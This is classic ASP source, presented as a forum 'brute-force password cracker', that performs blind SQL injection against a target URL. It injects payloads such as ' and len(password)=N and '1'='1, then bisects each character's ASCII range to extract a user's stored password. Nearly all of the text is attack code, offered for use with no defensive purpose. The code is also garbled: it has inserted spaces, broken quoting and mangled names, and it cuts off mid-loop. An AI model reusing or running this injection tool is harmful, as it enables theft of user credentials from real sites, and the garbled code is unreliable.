Code for brute-force password cracking on the Internet Forum

<%
Response. Buffer = false
'The maximum retry values are initialized to prevent programs from getting stuck in an endless loop.
Dim maxpasslen, maxpassasc
Maxpasslen = 20' Maximum Password Length
Maxpassasc = 20

'= Character conversion
Function bytes2bstr (VIN)
Strreturn = ""
For j = 1 to lenb (VIN)
Thischarcode = ASCB (midb (VIN, J, 1 ))
If thischarcode <& h80 then
Strreturn = strreturn & CHR (thischarcode)
Else
Nextcharcode = ASCB (midb (VIN, J + 1, 1 ))
Strreturn = strreturn & CHR (clng (thischarcode) * & h100 + CINT (nextcharcode ))
J = J + 1
End if
Next
Bytes2bstr = strreturn
End Function
'Here is the webpage content ============
Function geturl (URL)
Set osend = Createobject ("Microsoft. XMLHTTP ")
Sourcecode = osend. Open ("get", URL, false)
Osend. Send ()
Sourcecode = bytes2bstr (osend. responsebody)
Geturl = sourcecode
End Function
'Here are the page effects to be inferred.
Function chkpage (sourcecode, suckey, errkey)
If instr (sourcecode, suckey)> 0 then
Chkpage = true' page returns success
Exit Function
End if
If instr (sourcecode, errkey)> 0 then
Chkpage = false' page Error
Exit Function
End if
Chkpage = false'incorrect keyword information or page not connected
Response. Write ("Incorrect keyword information or the page is not connected ")
Response. End
End Function

'Start cracking
'Dim URL, username, password, suckey,

Dim passlenurl
Dim passlen
Dim chkpasslen

If request ("begin") <> "then
Response. Cookies ("passlen") = 0
Url = request ("url ")
Username = request ("username ")
Password = request ("password ")
Suckey = request ("suckey ")
Errkey = request ("errkey ")
Response. Write ("Step 1: crack the password length <br> ")

Passlen = 1
Chkpasslen = false
Do while not chkpasslen
Passlenurl = URL & username & "'% 20and % 20len (" & password & ") =" & passlen & "% 20and % 20 '1' = '1"
Response. Write ("the number of digits of the current login password is" "& passlen &" ". Please wait... <br> ")
Chkpasslen = chkpage (geturl (passlenurl), suckey, errkey)
If chkpasslen then
Response. Write ("Successful !!! The number of digits of the password has been checked out. Start the detailed number of digits of the password test <br> ")
Exit do
Else
Response. Write ("no, please try again next time! <Br> ")
End if
If passlen> maxpasslen then
Response. Write ("the number of password digits failed to be exported. Please confirm whether this user exists or adjust the password length range again ")
Response. End
Exit do
End if
Passlen = passlen + 1
Loop
Response. write ("<font color = Red> the password length has been exported to" & passlen & ", and the detailed password value for the start trial </font> <br> ")
'Loop every bit
Dim asc1, asc2, asc10, asc20, ascstr
'Dim ascarr (passlen)
Dim chkpass, asctemp1, asctemp, count
Ascstr = ""

For I = 1 to passlen
Chkpass = false
Asc1 = 33
Asc2= 126
Response. Write "initial password cracking" & I & "bit password <br>"
'Use the bipartite method to obtain the ASC code range.
Count = 1
Suc = false
Do while not suc
Asctemp1 = asctemp
If (Asc2-Asc1) mod 2 = 1 then
Asctemp = (Asc2-Asc1-1)/2
Else
Asctemp = (Asc2-Asc1)/2
End if

Response. write "the password range is:" & CHR (asc1) & "--" & CHR (asc2) & passlenurl & "<br>"
Passlenurl = URL & username & "'% 20and % 20asc (mid (password," & I & ", 1) >=" & int (asc1) & "% 20and % 20asc (mid (password," & I & ", 1) <=" & int (asc2) & "% 20and % 20 '1' = '1"
Response. write "the password range is:" & CHR (asc1) & "--" & CHR (asc2) & passlenurl & "<br>"
Chkpass = chkpage (geturl (passlenurl), suckey, errkey)
If asc1 = 33 and asc2= 126 and not chkpass then
Response. Write "password is not in the range of the configured ASC code"
%>